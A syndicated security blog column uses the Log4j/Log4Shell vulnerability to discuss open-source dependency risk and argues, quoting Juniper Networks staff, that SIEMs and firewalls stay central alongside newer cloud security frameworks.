SBN

MY TAKE: Log4j’s big lesson – legacy tools, new tech are both needed to secure modern networks

Log4j is the latest, greatest vulnerability to demonstrate just how tenuous the security of modern networks has become.

Related: The exposures created by API profileration

Log4j, aka Log4Shell, blasted a surgical light on the multiplying tiers of attack vectors arising from enterprises’ deepening reliance on open-source software.

This is all part of corporations plunging into the near future: migration to cloud-based IT infrastructure is in high gear, complexity is mushrooming and fear of falling behind is keeping the competitive heat on. In this heady environment, open-source networking components like Log4j spell opportunity for threat actors. It’s notable that open-source software vulnerabilities comprise just one of several paths ripe for malicious manipulation.

By no means has the cybersecurity community been blind to the complex security challenges spinning out of digital transformation. A methodical drive has been underway for at least the past decade to affect a transition to a new network security paradigm – one less rooted in the past and better suited for what’s coming next.

Log4j bathes light on a couple of solidifying developments. It reinforces the notion that a new portfolio of cloud-centric security frameworks must take hold, the sooner the better. What’s more, it will likely take a blend of legacy security technologies – in advanced iterations – combined with a new class of smart security tools to cut through the complexities of defending contemporary business networks.

I’ve recently had several deep-dive discussions with cybersecurity experts at Juniper Networks, about this. The Sunnyvale, Calif.-based networking systems supplier, like any number of other established tech giants, as well as innumerable cybersecurity startups, is deeply vested in seeing this transition through to the end. Here are key takeaways:

Messy co-dependencies

It’s ironic that open-source software is steeped in altruism. In the early days of the Internet, coders created new programs for the sake of writing good code, then made it available for anyone to use and extend, license free. However, once the commercial Internet took hold, developers began leveraging open-source components far and wide in proprietary systems.

Open-source vulnerabilities in enterprise networks have since become a massive security blind spot. Log4j was preceded by JBoss, Poodle, Shellshock and Heartbleed. These were all obscure open-source components that, over time, became deeply embedded in enterprise systems across the breadth of the Internet, only to have a gaping vulnerability discovered in them late in the game.

Log4j, for instance, is a ubiquitous logging library. Its rather mundane function is to record events in a log for a system administrator to review and act upon, later. Log4Shell now refers to the family of vulnerabilities — and related exploits — unearthed last December by a white hat researcher at Alibaba, the Chinese equivalent of Google. Left unpatched Log4Shell vulnerabilities present easy paths for a threat actor to take full control of the underlying system.

The bigger picture, says Mike Spanbauer, security evangelist at Juniper Networks, is that enterprises to this day continue to deploy open-source components often without consistent rigor of lacking the formal infusion of security quality assurance coding practices. Gaping security holes regularly get discovered by hackers – both white hat and black hat – engaged in probing randomly for soft spots.

Expediency and cost savings drove commercial adoption of open-source components in the early days of the commercial Internet. And the very same mindset persists today, perhaps even more so, as companies increasingly rely on open-source software to keep pace, observes Kate Adam, Juniper Network’s senior director of security product marketing.

Adam

“This is an established practice that’s now influencing in a new way due to how the business environment has shifted,” Adam says. The intensely competitive cybersecurity talent market is partly to blame here. Companies increasing reach for off-the-shelf open-source components, Adam says, to some degree because of the scarcity of skilled coders, especially those steeped in security.

“Some enterprises never use anything open-source and always do everything themselves, but that’s a massive undertaking, and they’re in a tiny minority,” she says. Indeed, according to the Linux Foundation, as much as 80 percent of the code in current applications is open source, often buried deep.

Log4Shell illuminated the security snarls and tangles created by software co-dependencies that, in many organizations, have congealed into a chaotic, indecipherable mess. Here’s how Spanbauer describes what this looks like — from the perspective of an enterprise’s IT and security teams.

“How a given open-source library works in a specific app can be a mystery because arbitrary parties contributed pieces of coding that may or may not have been documented,” he says. “This makes for very flexible, very agile code, but there is also an absence of the data that you need for your security models — to determine how to best protect the assets you’re responsible for . . . This is the current state of affairs for practically every organization, almost without exception. And these types of co-dependencies are here to stay. They’re now the norm and security teams must assess and manage the risk of these stacks.”

Legacy tech’s role

Log4Shell actually contributes to progress in this sense: it heightens awareness, which should help accelerate the transition to a much-needed new security paradigm. Many more Gordian-knot issues that need to be dealt with, to be sure. Complex and evolving cyber risks need to be resolved, for instance, when it comes to securing human and machine identities, tightening supply chains, mitigating third-party risks, protecting critical infrastructure and preserving individuals’ privacy.

Emerging frameworks, like Zero Trust Network Access (ZTNA,) Cloud Workload Protection Platform (CWPP,) Cloud Security Posture Management (CSPM) and Secure Access Service Edge (SASE) aim to help mitigate this spectrum of intensifying risks. Frameworks like these serve as guideposts. The task at hand is to steer the center of gravity for securing networks to the Internet edge, where cloud-centric resources and services increasingly reside.

This trend is well underway, and the handwriting is on the wall for many costly cybersecurity tools and services that were first installed 20 years to protect on-premises datacenter: obsolescence is on the near horizon. That said, a couple of prominent legacy technologies seem sure to endure as security cornerstones, moving forward. I’m referring to Security Information and Event Management (SIEM) systems and to firewalls.

SIEMs failed to live up to their hype in the decade after they were first introduced in 2005. Then about five years ago SIEMs got recast as the ideal mechanism for ingesting event log data arriving from Internet traffic, corporate hardware, mobile and IoT devices and cloud-hosted resources — the stuff of digital transformation.

This rejuvenation of SIEMs coincided with the emergence of advanced data analytics tools that could make more effective use of SIEM event logs; system orchestration became streamlined, human behavior got factored in and incident response became automated.

As cloud-hosted processing power and data storage have gained more traction, the role of on-premises data centers has declined. Yet legacy protections for on-premises data centers continue to predominate. The unhappy result: cyber exposures — and successful network breaches – have continued to scale up.

Log4Shell is just the latest reminder that gaping security holes lay dormant everywhere, just waiting to be discovered and exploited, in both the cloud and on-premises environments. Consider how ransomware has thrived in the transitional environment we’re now in, and how cyber espionage and cyber warfare have come to factor into geopolitical power struggles.

“Having the requisite technology to protect the data center and the edge actually is not enough, in and of itself,” Adam observes. “It’s now vital to be able to see the entire environment and respond to anomalies in near real time. SIEMs have become so popular because they pull everything together through logs.”

Visibility is vital

Where is this all taking us? New security frameworks, like ZTNA, CWPP, CSPM, and SASE are the blueprints for networks where the event logs ingested by SIEMs get put to higher uses detecting and responding to legitimate threats. This will come to fruition on smarter platforms using automated tools, including advanced firewalls.

Firewalls predate SIEMs. Firewalls arrived on day one of companies connecting their networks to the Internet. While a SIEM unit ingests incoming traffic for analysis, a firewall filters traffic flowing in and out of a network.

The earliest firewalls filtered the tiny packets of data exchanged between applications, allowing only the packets that met certain criteria to pass through. This became the basis for blacklisting traffic originating from known bad IP addresses and for restricting employees from connecting to malicious webpages.

Next Generation Firewalls (NGFW) came along in approximately the same time frame as the earliest SIEM systems. NGFWs could conduct deeper, much more detailed packet filtering and soon began taking on more advanced functionalities. NGFWs today can enforce security policies at the application, port, and protocol levels – often detecting and blocking the stealthiest malware from slipping into a network.

The evolution of firewalls, in fact, has never really slowed down and is continuing apace. Firewalls today come in an array of form factors; they’re available as an on-premises appliance, they can be set up to run virtually, or they can even be delivered as a subscription service.

Spanbauer

“You can’t protect what you can’t see,” Spanbauer says. “Visibility is the key. Companies today, at a minimum, need a way to accurately detect potentially malicious events in a highly complex environment, one that’s only getting more complex. When it comes to visibility, a SIEM helps me see as much data as possible, and a firewall helps me to enforce policy and ensure the accuracy of my verdicts. It’s vital to eliminate any false positives, otherwise I’d just be adding to the chaos and creating more work for teams to investigate.”

SIEMs and firewalls clearly will remain at the core of bringing machine learning and leading-edge analytics to bear in the data-rich environment we’re in. “These legacy technologies are going to have a place for a very long time to come — helping companies to more effectively manage this transition and to limit the chaos as much as possible,” Adam says.

It’s logical for SIEMs and firewalls to play ever larger roles in automating detection and response tasks as part of helping enterprises cut through the complexity and calm the chaos — and materially raise the bar for network security.  I’ll keep watch and keep reporting.

Acohido

Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.


(LW provides consulting services to the vendors we cover.)

 

*** This is a Security Bloggers Network syndicated blog from The Last Watchdog authored by bacohido. Read the original post at: https://www.lastwatchdog.com/my-take-log4js-big-lesson-legacy-tools-new-tech-are-both-needed-to-secure-modern-networks/